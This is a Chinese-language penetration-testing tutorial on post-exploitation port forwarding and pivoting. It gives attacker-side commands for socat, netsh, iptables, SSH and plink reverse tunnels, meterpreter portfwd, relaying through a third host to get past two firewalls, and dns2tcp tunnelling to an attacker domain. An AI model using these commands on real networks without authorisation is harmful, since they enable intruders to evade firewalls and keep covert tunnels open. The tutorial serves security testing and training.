渗透测试和利用后的端口转发
内容
·1本地端口转发
·2远程端口转发
·3一次绕过两个防火墙
·4 dns2tcp
在黑客攻击(渗透测试)和后期利用时,最简单的事情可能是在某处转发一个端口。简单的端口转发有很多选项。
事实上,对于简单的转发,美妙的socat实用程序就足够了:
victimgt; socat.exe tcp-listen:4445,fork tcp-connect:target:445
简单的端口转发
顺便说一下,socat程序是从 Linux 移植过来的,因此也可以使用完全相同的语法在那里使用。一般来说,socat的可能性比简单的转发要广泛得多。稍后我们将返回此实用程序。
如果攻击者在受感染的机器上拥有管理员或 root 权限,则可以使用防火墙工具执行重定向。在 Windows 上,它是这样完成的:
victim#>netsh interface portproxy add v4tov4 listenport=4445 listenaddress=victim
connectport=445 connectaddress=target
在这样的 Linux 上:
victim#>iptables -t nat -A PREROUTING -p tcp --dport 4445 -j DNAT --to-destination target:445
本地端口转发
说到端口转发,SSH 不容小觑,它是一种相当灵活的解决方案,经常用于此目的。事实上,SSH 执行了一个不太普通的重定向。它创建隧道,允许你重用连接 - 在已建立的另一个网络连接中转发新的网络连接。值得注意的是,服务器和客户端都可以充当转发链接。
我们假设受害者上正在运行一个 SSH 服务器,而不管那里使用的是什么操作系统。转发如下:
attacker>ssh-N user@victim-L 4445:target:445
使用 SSH 的端口转发
远程端口转发
远程端口转发与本地转发的不同之处仅在于该过程本身是从 SSH 服务器执行的。在这种情况下,转发方向将与已建立的 SSH 连接相反。
如果你需要通过攻击者与受害者组织一个渗漏通道,远程端口转发可能会很有用。例如,通过在与 Internet 隔离的受感染主机上的代理下载它们来安装必要的软件包。
但更常见的是,如果受害者没有运行 SSH 服务器或端口被过滤,则使用远程端口转发。在这种情况下,我们仍然可以将端口转发给攻击者,但是是在受害者的主动权下。
首先,在我们的站点上启动一个 SSH 服务器并创建一个虚拟帐户:
attacker>sudo/etc/init.d/ssh start
attacker>useradd-M -N -d /dev/null -s /bin/false proxy
attacker>passwd proxy
要通过 SSH 进行非交互登录,我们使用以下密钥:
victimgt;chown user priv_key
victimgt;chmod 0400 priv_key
现在我们根据反向连接方案创建转发:
victimgt;ssh-ipriv_keyproxy@attacker-N -R 4445:target:445 -o StrictHostKeyChecking=no
反向连接转发
类似的方法也有助于绕过防火墙或 NAT。在 Windows 上,你很可能找不到 SSH 服务器,我们还需要使用便携式客户端使用远程端口转发:
1
victim> plink.exe -N -l proxy -pw passwd-R 4445:target:445 attacker -P 22
结果,我们得到了与上图相同的配置。如图所示,在本地端口转发的情况下,客户端扮演转发的角色,而远程端口转发则扮演服务器的角色。
使用metasploit,我们还可以使用受害者和攻击者之间的连接执行转发,即组织隧道。要构建攻击者:4445 → 受害者 → 目标:445 隧道,请执行以下操作:
meterpreter>portfwd add -L 127.0.0.1 -l 4445 -r target -p 445
组织受害者:6666 → 攻击者 → 目标:8888 隧道,执行以下命令:
meterpreter>portfwd add -R -L target -l 8888 -p 6666
一次绕过两个防火墙
当攻击者和受害者位于防火墙或 NAT 后面的不同网络上并且无法直接在任一方向建立连接时,攻击者通常必须处理隔离良好的 VLAN。
攻击者和受害者位于防火墙或 NAT 后面的不同网络上
没有反向 shell 或 SSH 隧道可以帮助我们。或者,你可以安排从另一个 VLAN 访问“第三个”主机,两者都可以启动 TCP 连接。
通过第三台主机建立连接
找到这样的主机通常不是问题。当然,这第三台主机无法克服防火墙并以同样的方式联系攻击者或受害者。为了解决这个问题,我们使用以下技巧:
thirdgt;socat tcp-listen:5555 tcp-listen:6666
victimgt;socat tcp-connect:third:6666 tcp-connect:target:22
使用中间主机建立连接
启动到5555 / tcp的第一个连接很重要,因为在tcp - listen : 5555连接建立之后,socat会执行另一半的套接字操作(tcp - listen : 6666)。结果,事实证明,两个传入连接通过管道连接,并且流量可以通过该管道同时绕过两个防火墙或 NAT。
方案绕过防火墙和 NAT
结果,我们可以访问隐藏在防火墙后面的目标机器上的端口 22。
dns2tcp
现在让我们考虑一个困难但仍然非常典型的案例:无法从受感染的网络访问 Internet。将不得不再次使用 DNS。
dns2tcp实用程序可用于 Windows 和 Linux,并使用类似于 SSH 的端口转发语法。在攻击者的服务器端,我们在 dns2tcpdrc 中指定以下设置:
listen = 1.2.3.4
port = 53
user = nobody
key = s3cr3t
chroot=/var/empty/dns2tcp/
domain = attacker.tk
attacker>sudo ./dns2tcpd -F -d3 -f dns2tcpdrc
我们将客户端部分复制给受害者。要沿路由受害者:4444 → 攻击者 → 目标:5555 转发流量,请使用以下参数运行实用程序:
victimgt; dns2tcpc.exe -z attacker.tk -k s3cr3t -t 3 -L 4444:target:5555 8.8.8.8
要沿着攻击者:4445 → 受害者 → 目标:445 路由转发,运行工具如下:
victimgt; dns2tcpc.exe -z attacker.tk -k s3cr3t -t 3 -R 4445:target:445 8.8.8.8
现在,通过这条隧道,你可以组织代理或转发meterpreter会话,而无需担心没有互联网。